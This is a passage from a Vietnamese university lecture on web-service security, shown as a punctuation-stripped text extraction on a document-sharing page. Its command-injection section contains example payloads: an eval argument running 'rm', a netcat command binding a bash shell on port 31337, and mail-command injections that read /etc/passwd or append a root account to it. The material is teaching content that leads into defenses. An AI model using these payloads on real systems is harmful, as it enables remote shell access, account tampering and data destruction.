Bài giảng An ninh mạng - Bài 9: An toàn dịch vụ web - SQL injection, XSS, CSRF

Bài giảng An ninh mạng - Bài 9: An toàn dịch vụ web - SQL injection, XSS, CSRF. Bài này cung cấp cho sinh viên những nội dung gồm: tổng quan về hoạt động của dịch vụ Web; tấn công dạng Command Injection; SQL Injection; XSS; CSRF; quản lý phiên; . Mời các bạn cùng tham khảo! | BÀI 9. AN TOÀN DỊCH VỤ WEB SQL INJECTION XSS CSRF Bùi Trọng Tùng Viện Công nghệ thông tin và Truyền thông Đại học Bách khoa Hà Nội 1 Nội dung Tổng quan về hoạt động của dịch vụ Web Tấn công dạng Command Injection SQL Injection XSS CSRF Quản lý phiên 2 1 1. TẤN CÔNG DẠNG COMMAND INJECTION Bùi Trọng Tùng Viện Công nghệ thông tin và Truyền thông Đại học Bách khoa Hà Nội 3 Command Injection Lợi dụng lỗ hổng không kiểm soát giá trị các đối số khi thực thi kịch bản servlet trên web server Không phân biệt được dữ liệu và mã nguồn trong đối số Ví dụ Website chứa servlet cung cấp tính năng tính toán biểu thức bất kỳ qua hàm eval http in _GET exp Nội dung biểu thức được truyền eval ans . in . qua đối số exp. Ví dụ http exp 1 1 Servlet thực thi như thế nào nếu truyền đối số như sau http exp 10 system rm . 4 2 Command Injection Ví dụ khác 1. http exec Client Server 2. Send page Ping for FREE Enter an IP address below Ô nhập dữ liệu 6 3 Command Injection Ví dụ khác Client Server 2. Send page t _REQUEST ip o shell_exec ping C 3 . t echo o PHP exec program 7 Command Injection Ví dụ khác ls Client Server 2. Send page t _REQUEST ip o shell_exec ping C 3 . t echo o PHP exec program 8 4 Command Injection Ví dụ khác Thực thi shell ip 26 netcat -v - e bin bash -l -p 31337 amp submit submit netcat v e bin bash l p 31337 9 Command Injection Ví dụ khác Mã PHP để gửi email email _POST email subject _POST subject system mail email s subject lt tmp joinmynetwork Chèn mã thực thi khi truyền giá trị cho đối số http email hacker@ amp subject foo lt usr passwd ls Hoặc http email hacker@ amp subject foo echo evil 0 0 root bin sh quot gt gt etc passwd ls 10 5 Phòng chống Kiểm tra chỉ chấp nhận giá trị chứa các ký tự hợp lệ Ký tự nào là hợp lệ Phụ thuộc ngữ cảnh Làm sạch đầu vào input sanitization Xác định các ký tự đặc biệt không nên xuất .

Không thể tạo bản xem trước, hãy bấm tải xuống
Tải xuống
TÀI LIỆU LIÊN QUAN

Bài giảng An ninh mạng máy tính - Chương 8: Các giao thức an ninh thông dụng (ThS. Lương Minh Huấn)
57    252    7

Bài giảng An ninh mạng máy tính - Chương 1: Tổng quan về an ninh mạng máy tính (ThS. Lương Minh Huấn)
126    335    23

Đề cương bài giảng học phần An ninh mạng
6    529    15

Bài giảng An ninh mạng – Chương 1: Giới thiệu (TS Nguyễn Đại Thọ)
18    522    26

Bài giảng An ninh mạng: Chương 1 - ThS. Trần Bá Nhiệm
22    261    17

Đề cương chi tiết bài giảng An ninh mạng
6    303    4

Bài giảng An ninh mạng máy tính - Chương 7: An ninh tầng giao vận (ThS. Lương Minh Huấn)
45    208    8

Bài giảng An ninh mạng - Chương 5: Bảo đảm an toàn mạng
52    279    8

Bài giảng An toàn bảo mật mạng: Chương 1 - ThS. Trần Đắc Tốt
96    259    16

Bài giảng An toàn và an ninh mạng – Bùi Trọng Tùng
33    233    10
TÀI LIỆU XEM NHIỀU

Thiết kế kế hoạch bài học môn Toán theo định hướng phát triển năng lực học sinh
13    40876    2412

Phân tích và làm rõ ý kiến sau: “Bài thơ Tự tình II vừa nói lên bi kịch duyên phận vừa cho thấy khát vọng sống, khát vọng hạnh phúc của Hồ Xuân Hương”
3    24938    248

31 Câu hỏi ôn tập môn Chủ nghĩa xã hội khoa học
25    24483    4281

Tiểu luận: Vai trò của Nguyễn Ái Quốc đối với việc thành lập Đảng Cộng sản Việt Nam
16    20060    2846

Tiểu luận Tình huống xử lý sai phạm trong thanh toán công tác phí lưu động
20    19492    1543

100 câu hỏi trắc nghiệm Triết học Mác-Lênin kèm đáp án
14    19294    2967

Bảng biến đổi Laplace và biến đổi Z
1    19264    616

Ebook Ôn luyện tiếng Anh 9 có đáp án: Phần 2 - Mai Lan Hương, Hà Thanh Uyên
37    16161    2958

Đề thi và Đáp án môn Tiếng Việt thực hành - ĐH SPKT TP.HCM
3    15976    330

Sự so sánh văn bản văn học và tác phẩm văn học
1    14577    133
TỪ KHÓA LIÊN QUAN
TÀI LIỆU MỚI ĐĂNG

Ebook Cambridge primary Science English learner book 2
34    100    4    29-05-2024

Mô hình phòng học, phòng làm việc đa phương tiện - Một đề xuất nhằm đáp ứng cho nguồn nhân lực trong bối cảnh chuyển đổi số
8    180    1    29-05-2024

Luận văn Thạc sĩ Quản lý kinh tế: Đánh giá công tác quản lý chất lượng công trình xây dựng sử dụng nguồn vốn ngân sách nhà nước tại huyện Gò Dầu, tỉnh Tây Ninh
133    2    1    29-05-2024

Giáo trình Lắp đặt máy bơm nước, bảo dưỡng trạm bơm (Nghề: Điện nước - Trung cấp nghề) - Trường Cao đẳng nghề Xây dựng
121    153    12    29-05-2024

Luận văn Thạc sĩ Tài chính ngân hàng: Phát triển dịch vụ ngân hàng điện tử tại Agribank chi nhánh huyện Yên Lập, tỉnh Phú Thọ
115    87    3    29-05-2024

Luận văn Thạc sĩ Kinh tế: Mối quan hệ giữa bất bình đẳng thu nhập và tăng trưởng kinh tế trên địa bàn tỉnh Quảng Nam
112    87    4    29-05-2024

Bài tập cơ học lý thuyết nhập môn: Phần 1
241    1    1    29-05-2024

Luận án Tiến sĩ Luật học: Những vấn đề lý luận và thực tiễn về miễn trách nhiệm hình sự theo luật hình sự Việt Nam
50    197    2    29-05-2024

Health beliefs and (timely) use of facility-based care for under-five children: Lessons from the qualitative component of Nigeria’s 2019 VASA
13    64    1    29-05-2024

Phân tích xác suất phá hủy địa chấn cho trụ và gối cầu của công trình cầu vượt bê tông cốt thép trên tuyến cao tốc Đà Nẵng - Quảng Ngãi
16    230    1    29-05-2024

Giải quyết việc làm cho thanh niên hoàn thành nghĩa vụ quân sự ở thành phố Hà Nội hiện nay - một số quan điểm cơ bản cần quán triệt và thực hiện
3    411    4    29-05-2024

Luận văn Thạc sĩ Quản trị nhân lực: Tạo động lực làm việc cho lao động hợp đồng tại Bệnh viện Lão khoa Trung ương
126    234    4    29-05-2024

Đề thi kết thúc học phần học kì 1 môn Công tác quốc phòng - an ninh năm 2019-2020 có đáp án - Trường ĐH Đồng Tháp
5    181    6    29-05-2024

Đề thi học kì 2 môn Tiếng Anh lớp 6 năm 2020-2021 - Trường THCS Thị trấn Vũ Thư
2    71    1    29-05-2024

Đề thi tuyển sinh vào lớp 10 môn Toán năm 2021-2022 có đáp án (Vòng 5) - Trường THCS Nguyễn Công Trứ
4    198    2    29-05-2024

Bài giảng Kinh tế vĩ mô: Chương 2 - Đoàn Bích Hạnh
12    105    1    29-05-2024

Efficacy of a competitive exclusion culture against extended-spectrum β-lactamaseproducing Escherichia coli strains in broilers using a seeder bird model
7    65    1    29-05-2024

Web technologies and e-services: Lecture 2
45    75    2    29-05-2024

Luận văn Thạc sĩ Quản lý kinh tế: Quản lý nhà nước về an toàn thực phẩm trên địa bàn huyện Núi Thành, tỉnh Quảng Nam
120    67    1    29-05-2024

Giáo trình Phân tích mạch điện - kiểm tra và xử lý sự cố (Nghề Sửa chữa điện máy công trình – Trình độ trung cấp): Phần 2 – CĐ GTVT Trung ương I
115    193    1    29-05-2024
TÀI LIỆU HOT

Phân tích và làm rõ ý kiến sau: “Bài thơ Tự tình II vừa nói lên bi kịch duyên phận vừa cho thấy khát vọng sống, khát vọng hạnh phúc của Hồ Xuân Hương”
3    24938    248

Thiết kế kế hoạch bài học môn Toán theo định hướng phát triển năng lực học sinh
13    40876    2412

CẬP  NHẬT KINH TẾ VĨ MÔ VIỆT NAM 6 tháng đầu năm 2020
3    2773    81

Sách trắng Doanh nghiệp Việt Nam năm 2020
580    5091    363

Việt Nam 2035 hướng tới thịnh vượng, sáng tạo, công bằng và dân chủ
584    3345    100

BÀI GIẢNG DỰNG HÌNH SKETCHUP 2020 BIÊN SOẠN : GV.KTS PHAN THỨC
62    6666    1

GIÁO TRÌNH TIẾNG ANH ENG BREAKING
171    5699    719

Quản trị khủng hoảng trong quan hệ công chúng
2    3133    78

Báo cáo thực tập chuyên ngành: Nghiên cứu, thiết kế, mô phỏng robot công nghiệp
51    4461    200

Đề tài “ Cân đối ngân sách nhà nước- thực trạng và hướng hoàn thiện”
53    4747    189
Đã phát hiện trình chặn quảng cáo AdBlock
Trang web này phụ thuộc vào doanh thu từ số lần hiển thị quảng cáo để tồn tại. Vui lòng tắt trình chặn quảng cáo của bạn hoặc tạm dừng tính năng chặn quảng cáo cho trang web này.